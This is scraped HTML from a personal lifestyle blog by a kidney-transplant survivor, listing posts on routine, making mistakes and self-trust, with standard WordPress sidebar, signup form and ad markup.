data-orig-size="1080,1080" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="good routine instagram" data-image-description="" data-medium-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?fit=300%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?fit=1024%2C1024&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?w=1080&amp;ssl=1 1080w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=1024%2C1024&amp;ssl=1 1024w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=600%2C600&amp;ssl=1 600w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=640%2C640&amp;ssl=1 640w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=905%2C905&amp;ssl=1 905w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=500%2C500&amp;ssl=1 500w, https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=100%2C100&amp;ssl=1 100w" data-lazy-sizes="(max-width: 500px) 100vw, 500px" data-lazy-src="https://i0.wp.com/lifethereboot.com/wp-content/uploads/2019/05/good-routine-instagram.png?resize=500%2C500&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a> </div></div> </div> <div class="entry-half-right"> <div class="entry-header" > <div class="entry-meta"> <span class="entry-cat"><a href="https://lifethereboot.com/category/health/" rel="category tag">HEALTH</a> <a href="https://lifethereboot.com/category/lifestyle/" rel="category tag">LIFESTYLE</a> <a href="https://lifethereboot.com/category/personal-development/" rel="category tag">Personal Development</a></span> </div> <h2 class="entry-title"><a href="https://lifethereboot.com/why-routine-is-good-for-you/">Why Routine Is Good for You</a></h2> <div class="entry-meta"> <span class="entry-author">By <span><a href="https://lifethereboot.com/author/reclaimlife/" title="Posts by Dominique" rel="author">Dominique</a> </span></span> <span class="entry-date">on <a href="https://lifethereboot.com/2019/05/"> May 2, 2019</a> </span> </div> </div> <div class="entry-content"> <p>Many people refer to routine as being dull or boring. It implies that life is the same from one day to the next. However, routines are a great way to get your work done. It’s also a great means for teams to work together towards a common goal. When everyone has an understanding of what needs to get done, i.e., &hellip;</p> </div> </div> </div> <div class="entry-footer"> <div class="entry-footer-top"> <a href="https://lifethereboot.com/why-routine-is-good-for-you/" title="Why Routine Is Good for You" class="entry-button button-fill">Continue Reading</a> </div> <div class="entry-footer-bottom"> <div class="entry-comments"> <a href="https://lifethereboot.com/why-routine-is-good-for-you/#comments"> <span class="fa fa-comment"></span> <span class="comments-counting">21</span> </a> </div> </div> </div> </article><article id="entry-3915" class="post-3915 post type-post status-publish format-standard has-post-thumbnail hentry category-family category-health category-lifestyle category-personal-development tag-forgiveness tag-mistakes tag-self-trust tag-selfdevelopment tag-trust entry entry-left"> <div class="entry-row"> <div class="entry-half-left"> <div class="entry-media"><div style="max-width:500px;"><span style="padding-bottom:100&#37;"></span> <a href="https://lifethereboot.com/learn-how-to-make-mistakes/" class="entry-thumb" title="Learn How to Make Mistakes"><img width="500" height="500" src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=500%2C500&amp;ssl=1" class="attachment-WRT-list-view size-WRT-list-view wp-post-image jetpack-lazy-image" alt="" data-attachment-id="4596" data-permalink="https://lifethereboot.com/learn-how-to-make-mistakes/add-a-subheading-1-4/" data-orig-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?fit=1080%2C1080&amp;ssl=1" data-orig-size="1080,1080" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Add a subheading (1)" data-image-description="" data-medium-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?fit=300%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?fit=1024%2C1024&amp;ssl=1" data-lazy-srcset="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?w=1080&amp;ssl=1 1080w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=300%2C300&amp;ssl=1 300w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=768%2C768&amp;ssl=1 768w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=1024%2C1024&amp;ssl=1 1024w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=600%2C600&amp;ssl=1 600w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=640%2C640&amp;ssl=1 640w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=905%2C905&amp;ssl=1 905w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=500%2C500&amp;ssl=1 500w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=100%2C100&amp;ssl=1 100w" data-lazy-sizes="(max-width: 500px) 100vw, 500px" data-lazy-src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/Add-a-subheading-1.png?resize=500%2C500&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a> </div></div> </div> <div class="entry-half-right"> <div class="entry-header" > <div class="entry-meta"> <span class="entry-cat"><a href="https://lifethereboot.com/category/family/" rel="category tag">FAMILY</a> <a href="https://lifethereboot.com/category/health/" rel="category tag">HEALTH</a> <a href="https://lifethereboot.com/category/lifestyle/" rel="category tag">LIFESTYLE</a> <a href="https://lifethereboot.com/category/personal-development/" rel="category tag">Personal Development</a></span> </div> <h2 class="entry-title"><a href="https://lifethereboot.com/learn-how-to-make-mistakes/">Learn How to Make Mistakes</a></h2> <div class="entry-meta"> <span class="entry-author">By <span><a href="https://lifethereboot.com/author/reclaimlife/" title="Posts by Dominique" rel="author">Dominique</a> </span></span> <span class="entry-date">on <a href="https://lifethereboot.com/2019/04/"> April 25, 2019</a> </span> </div> </div> <div class="entry-content"> <p>This is an additional post about the steps to trusting yourself. One post covered ways to learn from others and another considered the reasons why you may not trust yourself. Mistakes play a role in that process as well. One reason why you don’t trust yourself is you are afraid to make mistakes. It’s a common situation for many people. &hellip;</p> </div> </div> </div> <div class="entry-footer"> <div class="entry-footer-top"> <a href="https://lifethereboot.com/learn-how-to-make-mistakes/" title="Learn How to Make Mistakes" class="entry-button button-fill">Continue Reading</a> </div> <div class="entry-footer-bottom"> <div class="entry-comments"> <a href="https://lifethereboot.com/learn-how-to-make-mistakes/#comments"> <span class="fa fa-comment"></span> <span class="comments-counting">28</span> </a> </div> </div> </div> </article><article id="entry-3923" class="post-3923 post type-post status-publish format-standard has-post-thumbnail hentry category-lifestyle category-personal-development tag-self-development tag-self-trust tag-trust entry entry-left"> <div class="entry-row"> <div class="entry-half-left"> <div class="entry-media"><div style="max-width:500px;"><span style="padding-bottom:100&#37;"></span> <a href="https://lifethereboot.com/why-dont-you-trust-yourself/" class="entry-thumb" title="Why Don’t You Trust Yourself?"><img width="500" height="500" src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=500%2C500&amp;ssl=1" class="attachment-WRT-list-view size-WRT-list-view wp-post-image jetpack-lazy-image" alt="" data-attachment-id="4594" data-permalink="https://lifethereboot.com/why-dont-you-trust-yourself/why-dont-you-trust-yourself-instagram/" data-orig-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?fit=1080%2C1080&amp;ssl=1" data-orig-size="1080,1080" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="why don&#8217;t you trust yourself instagram" data-image-description="" data-medium-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?fit=300%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?fit=1024%2C1024&amp;ssl=1" data-lazy-srcset="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?w=1080&amp;ssl=1 1080w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=300%2C300&amp;ssl=1 300w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=768%2C768&amp;ssl=1 768w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=1024%2C1024&amp;ssl=1 1024w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=600%2C600&amp;ssl=1 600w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=640%2C640&amp;ssl=1 640w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=905%2C905&amp;ssl=1 905w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=500%2C500&amp;ssl=1 500w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=100%2C100&amp;ssl=1 100w" data-lazy-sizes="(max-width: 500px) 100vw, 500px" data-lazy-src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2019/04/why-dont-you-trust-yourself-instagram.png?resize=500%2C500&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a> </div></div> </div> <div class="entry-half-right"> <div class="entry-header" > <div class="entry-meta"> <span class="entry-cat"><a href="https://lifethereboot.com/category/lifestyle/" rel="category tag">LIFESTYLE</a> <a href="https://lifethereboot.com/category/personal-development/" rel="category tag">Personal Development</a></span> </div> <h2 class="entry-title"><a href="https://lifethereboot.com/why-dont-you-trust-yourself/">Why Don’t You Trust Yourself?</a></h2> <div class="entry-meta"> <span class="entry-author">By <span><a href="https://lifethereboot.com/author/reclaimlife/" title="Posts by Dominique" rel="author">Dominique</a> </span></span> <span class="entry-date">on <a href="https://lifethereboot.com/2019/04/"> April 18, 2019</a> </span> </div> </div> <div class="entry-content"> <p>A previous post on this blog looked at Trusting Yourself and using tips from others to get there. And that&#8217;s a good start. But as part of learning to trust yourself, you need to understand WHY you don&#8217;t trust yourself&#8230; Many people don’t trust themselves for one reason or another. Knowing the cause can help you break the issue down &hellip;</p> </div> </div> </div> <div class="entry-footer"> <div class="entry-footer-top"> <a href="https://lifethereboot.com/why-dont-you-trust-yourself/" title="Why Don’t You Trust Yourself?" class="entry-button button-fill">Continue Reading</a> </div> <div class="entry-footer-bottom"> <div class="entry-comments"> <a href="https://lifethereboot.com/why-dont-you-trust-yourself/#comments"> <span class="fa fa-comment"></span> <span class="comments-counting">30</span> </a> </div> </div> </div> </article></div> <nav class="navigation pagination" role="navigation"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><span aria-current='page' class='page-numbers current'>1</span> <a class='page-numbers' href='https://lifethereboot.com/page/2/'>2</a> <a class='page-numbers' href='https://lifethereboot.com/page/3/'>3</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='https://lifethereboot.com/page/27/'>27</a> <a class="next page-numbers" href="https://lifethereboot.com/page/2/">Next &rarr;</a></div> </nav> </div> <div class="site-sidebar " id="sidebar" role="complementary"> <div class="sticky-sidebar"> <aside id="wrt_about-4" class="widget_title widget-line widget widget_wrt_about widget-ver"><h6 class="widget-title"><span>ABOUT ME</span></h6><div class="author"><div class="author-image circle "> <img src="https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/uploads/2018/03/Profile-Picture.jpg" alt="Dominique Brooks"> </div> <div class="author-meta"> <h6 class="author-name">Dominique Brooks</h6> <span class="auhtor-work">WRITER, TRANSPLANT SURVIVOR</span> <div class="author-desc">My name is Dominique, and I am rebooting my life after my kidney transplant in December 2017. Married with two teenagers (pray for us), I am excited about the future. I want to share that excitement with you through this blog.</div> <nav class="author-navigation"> <ul><li><a href="https://www.facebook.com/lifethereboot" target="_blank"><span class="fa fa-facebook"></span></a></li><li><a href="https://twitter.com/lifethereboot" target="_blank"><span class="fa fa-twitter"></span></a></li><li><a href="https://www.instagram.com/lifethereboot/" target="_blank"><span class="fa fa-instagram"></span></a></li><li><a href="https://www.pinterest.com/lifethereboot/" target="_blank"><span class="fa fa-pinterest-p"></span></a></li><li><a href="https://plus.google.com/u/0/b/110795293840323358475/104294516904926731155" target="_blank"><span class="fa fa-google-plus"></span></a></li></ul> </nav> </div> </div></aside><aside id="mc4wp_form_widget-3" class="widget_title widget-line widget widget_mc4wp_form_widget widget-ver"><h6 class="widget-title"><span>Sign Up to Life: The Reboot</span></h6><script>(function() { if (!window.mc4wp) { window.mc4wp = { listeners: [], forms : { on: function (event, callback) { window.mc4wp.listeners.push({ event : event, callback: callback }); } } } } })(); </script><!-- Mailchimp for WordPress v4.5.2 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-2219" method="post" data-id="2219" data-name="Sign Up to the Life: The Reboot Blog!" ><div class="mc4wp-form-fields"><p> <label><a href="https://lifethereboot.com/terms-and-conditions/" target="_blank"><input name="_mc4wp_agree_to_terms" type="checkbox" value="1" required=""> I have read and agree to the terms &amp; conditions</a> </label> </p> <p> <label>First Name</label> <input type="text" name="FNAME" required=""> </p> <p> <label>Last Name</label> <input type="text" name="LNAME" required=""> </p> <p> <label>Email address: </label> <input type="email" name="EMAIL" placeholder="Your email address" required /> </p> <p> <input type="submit" value="Sign up" /> </p></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1558014412" /><input type="hidden" name="_mc4wp_form_id" value="2219" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></aside><aside id="wrt_facebook_like_box-1" class="widget_title widget-non-line widget widget_wrt_facebook_like_box widget-ver"><h6 class="widget-title"><span>LIKE US</span></h6><div class="fb-page" data-href="https://www.facebook.com/lifethereboot" data-hide-cover="false"data-show-posts="false"data-show-facepile="false" data-small-header ="false" data-adapt-container-width = "true"data-hide-cta ="false" ></div></aside><aside id="wrt_social-4" class="widget_title widget-line widget widget_wrt_social widget-ver"><h6 class="widget-title"><span>FOLLOW ME</span></h6><nav class="social-navigation original-colors"> <ul><li><a href="https://www.facebook.com/lifethereboot" target="_blank"> <span class="fa fa-facebook"></span><small>Facebook</small></a></li><li><a href="https://twitter.com/lifethereboot" target="_blank"><span class="fa fa-twitter"></span><small>Twitter</small></a></li><li><a href="https://www.instagram.com/lifethereboot/" target="_blank"><span class="fa fa-instagram"></span><small>Instagram</small></a></li><li><a href="https://www.pinterest.com/lifethereboot/" target="_blank"><span class="fa fa-pinterest-p"></span><small>Pinterest</small></a></li><li><a href="https://plus.google.com/u/0/b/110795293840323358475/104294516904926731155" target="_blank"><span class="fa fa-google-plus"></span><small>Google +</small></a></li><li><a href="https://www.youtube.com/channel/UCNJeK8d4Z_pzM4VUor-qH7Q" target="_blank"><span class="fa fa-youtube"></span><small>YouTube</small></a></li></ul> </nav></aside> <div class="wpcnt"> <div class="wpa"> <span class="wpa-about">Advertisements</span> <div class="u mrec"> <div style="padding-bottom:15px;width:300px;height:250px;"> <div id="atatags-2-5cdd69ccd48f1"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-2-5cdd69ccd48f1', { collapseEmpty: 'before', sectionId: '1437868433', location: 150, width: 300, height: 250 }); }); </script> </div> </div> </div> </div> </div><aside id="twitter_timeline-2" class="widget_title widget-non-line widget widget_twitter_timeline widget-ver"><h6 class="widget-title"><span>FOLLOW ME ON TWITTER</span></h6><a class="twitter-timeline" data-width="770" data-theme="light" data-link-color="#f96e5b" data-border-color="#e8e8e8" data-tweet-limit="1" data-lang="EN" data-partner="jetpack" href="https://twitter.com/@lifethereboot" href="https://twitter.com/@lifethereboot">My Tweets</a></aside></div> </div> </div> </div> </section> <footer id="site-footer" class="site-footer"> <div class="site-footer-top"> <div class="site-container"> <div class="site-row"> <div class=" site-column-4 "> <div id="nav_menu-3" class="widget_title widget-line widget widget_nav_menu widget-ver"><h6 class="widget-title"><span>Info</span></h6><div class="menu-primary-menu-container"><ul id="menu-primary-menu" class="menu"><li id="menu-item-24" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-24"><a href="https://lifethereboot.com" aria-current="page">HOME</a></li> <li id="menu-item-2147" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2147"><a href="https://lifethereboot.com/about-us/">ABOUT US</a></li> <li id="menu-item-62" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-62"><a href="https://lifethereboot.com/privacy-policy/">PRIVACY POLICY</a></li> <li id="menu-item-109" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-109"><a href="https://lifethereboot.com/terms-and-conditions/">TERMS/CONDITIONS</a></li> <li id="menu-item-44" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-44"><a href="https://lifethereboot.com/disclaimers/">DISCLAIMERS</a></li> <li id="menu-item-2182" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2182"><a href="https://lifethereboot.com/contact-2/">CONTACT US/USER REQUEST FORM</a></li> </ul></div></div> <div class="wpcnt"> <div class="wpa"> <span class="wpa-about">Advertisements</span> <div class="u mrec"> <div style="padding-bottom:15px;width:300px;height:250px;"> <div id="atatags-3-5cdd69ccd581f"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-3-5cdd69ccd581f', { collapseEmpty: 'before', sectionId: '1437868435', location: 150, width: 300, height: 250 }); }); </script> </div> </div> </div> </div> </div> </div> <div class=" site-column-4 "> <div class="wpcnt"> <div class="wpa"> <span class="wpa-about">Advertisements</span> <div class="u mrec"> <div style="padding-bottom:15px;width:300px;height:250px;"> <div id="atatags-4-5cdd69ccd5929"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-4-5cdd69ccd5929', { collapseEmpty: 'before', sectionId: '1437868436', location: 150, width: 300, height: 250 }); }); </script> </div> </div> </div> </div> </div><div id="widget_contact_info-9" class="widget_title widget-line widget widget_contact_info widget-ver"><h6 class="widget-title"><span>Contact Info</span></h6><div itemscope itemtype="http://schema.org/LocalBusiness"><div class="confit-address" itemscope itemtype="http://schema.org/PostalAddress" itemprop="address"><a href="https://maps.google.com/maps?z=16&#038;q=life%3A%2Bthe%2Breboot%2Bp.o.%2Bbox%2B722034%2Bhouston%2C%2Btx%2B77272%2Bunited%2Bstates" target="_blank">Life: The Reboot <br/>P.O. Box 722034 <br/>Houston, TX 77272 <br/>United States <br/> <br/></a></div><div class="confit-email"><a href="mailto:[email protected]">[email protected]</a></div></div></div> </div> <div class=" site-column-4 "> <div id="wrt_popular-post-2" class="widget_title widget-line widget widget_wrt_popular-post widget-ver"><h6 class="widget-title"><span>MOST POPULAR POSTS</span></h6><div class="entry-list entry-small-thumb"><article class="entry"><div class="entry-media"><div style="max-width:150px;"><span style="padding-bottom:100&#37;"></span> <a href="https://lifethereboot.com/you-need-a-better-water-bottle/" class="entry-thumb" title="You Need a Better Water Bottle"><img width="150" height="150" src="https://i1.wp.com/lifethereboot.com/wp-content/uploads/2018/07/better-water-bottle-instagram-resized.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image jetpack-lazy-image" alt="" data-attachment-id="3361" data-permalink="https://lifethereboot.com/you-need-a-better-water-bottle/better-water-bottle-instagram-resized/" data-orig-file="https://i1.wp.com/lifethereboot.com/wp-content/uploads/2018/07/better-water-bottle-instagram-resized.png?fit=500%2C500&amp;ssl=1" data-orig-size="500,500" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="better water bottle instagram-resized" data-image-description="" data-medium-file="https://i1.wp.com/lifethereboot.com/wp-content/uploads/2018/07/better-water-bottle-instagram-resized.png?fit=300%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/lifethereboot.com/wp-content/uploads/2018/07/better-water-bottle-instagram-resized.png?fit=500%2C500&amp;ssl=1" data-lazy-srcset="https://i1.wp.com/lifethereboot.com/wp-content/uploads/2018/07/better-water-bottle-instagram-resized.png?w=500&amp;ssl=1 500w, https://i1.wp.com/lifethereboot.com/wp-content/uploads/2018/07/better-water-bottle-instagram-resized.png?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/lifethereboot.com/wp-content/uploads/2018/07/better-water-bottle-instagram-resized.png?resize=300%2C300&amp;ssl=1 300w, https://i1.wp.com/lifethereboot.com/wp-content/uploads/2018/07/better-water-bottle-instagram-resized.png?resize=100%2C100&amp;ssl=1 100w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" data-lazy-src="https://i1.wp.com/lifethereboot.com/wp-content/uploads/2018/07/better-water-bottle-instagram-resized.png?resize=150%2C150&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a> </div></div><div class="entry-meta"></div> <h4 class="entry-title"><a href="https://lifethereboot.com/you-need-a-better-water-bottle/" title="Why Don’t You Trust Yourself?" rel="bookmark">You Need a Better Water Bottle</a></h4><div class="entry-meta"><span></span></div> </article><article class="entry"><div class="entry-media"><div style="max-width:150px;"><span style="padding-bottom:100&#37;"></span> <a href="https://lifethereboot.com/workout-search-walking-101/" class="entry-thumb" title="Workout Search: Walking 101"><img width="150" height="150" src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/06/gert-boers-152312-unsplash-resized.png?resize=150%2C150&amp;ssl=1" class="attachment-thumbnail size-thumbnail wp-post-image jetpack-lazy-image" alt="" data-attachment-id="3227" data-permalink="https://lifethereboot.com/workout-search-walking-101/gert-boers-152312-unsplash-resized/" data-orig-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/06/gert-boers-152312-unsplash-resized.png?fit=500%2C333&amp;ssl=1" data-orig-size="500,333" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="gert-boers-152312-unsplash-resized" data-image-description="" data-medium-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/06/gert-boers-152312-unsplash-resized.png?fit=300%2C200&amp;ssl=1" data-large-file="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/06/gert-boers-152312-unsplash-resized.png?fit=500%2C333&amp;ssl=1" data-lazy-srcset="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/06/gert-boers-152312-unsplash-resized.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/06/gert-boers-152312-unsplash-resized.png?resize=300%2C300&amp;ssl=1 300w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/06/gert-boers-152312-unsplash-resized.png?resize=100%2C100&amp;ssl=1 100w, https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/06/gert-boers-152312-unsplash-resized.png?zoom=3&amp;resize=150%2C150&amp;ssl=1 450w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" data-lazy-src="https://i2.wp.com/lifethereboot.com/wp-content/uploads/2018/06/gert-boers-152312-unsplash-resized.png?resize=150%2C150&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a> </div></div><div class="entry-meta"></div> <h4 class="entry-title"><a href="https://lifethereboot.com/workout-search-walking-101/" title="Why Don’t You Trust Yourself?" rel="bookmark">Workout Search: Walking 101</a></h4><div class="entry-meta"><span></span></div> </article></div></div> <div class="wpcnt"> <div class="wpa"> <span class="wpa-about">Advertisements</span> <div class="u mrec"> <div style="padding-bottom:15px;width:300px;height:250px;"> <div id="atatags-5-5cdd69ccdad2b"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-5-5cdd69ccdad2b', { collapseEmpty: 'before', sectionId: '1437868437', location: 150, width: 300, height: 250 }); }); </script> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="site-footer-bottom"> <div class="site-container text-center"> © 2018-2019 Life: The Reboot All Rights Reserved </div> </div> </footer> <!-- / footer --> <!-- Root element of PhotoSwipe. Must have class pswp. --> <div class="pswp" tabindex="-1" role="dialog" aria-hidden="true"> <!-- Background of PhotoSwipe. It's a separate element as animating opacity is faster than rgba(). --> <div class="pswp__bg"></div> <!-- Slides wrapper with overflow:hidden. --> <div class="pswp__scroll-wrap"> <!-- Container that holds slides. PhotoSwipe keeps only 3 of them in the DOM to save memory. Don't modify these 3 pswp__item elements, data is added later on. --> <div class="pswp__container"> <div class="pswp__item"></div> <div class="pswp__item"></div> <div class="pswp__item"></div> </div> <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. --> <div class="pswp__ui pswp__ui--hidden"> <div class="pswp__top-bar"> <!-- Controls are self-explanatory. Order can be changed. --> <div class="pswp__counter"></div> <button class="pswp__button pswp__button--close" title="Close (Esc)"></button> <button class="pswp__button pswp__button--share" title="Share"></button> <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button> <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button> <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR --> <!-- element will get class pswp__preloader--active when preloader is running --> <div class="pswp__preloader"> <div class="pswp__preloader__icn"> <div class="pswp__preloader__cut"> <div class="pswp__preloader__donut"></div> </div> </div> </div> </div> <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap"> <div class="pswp__share-tooltip"></div> </div> <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)"> </button> <button class="pswp__button 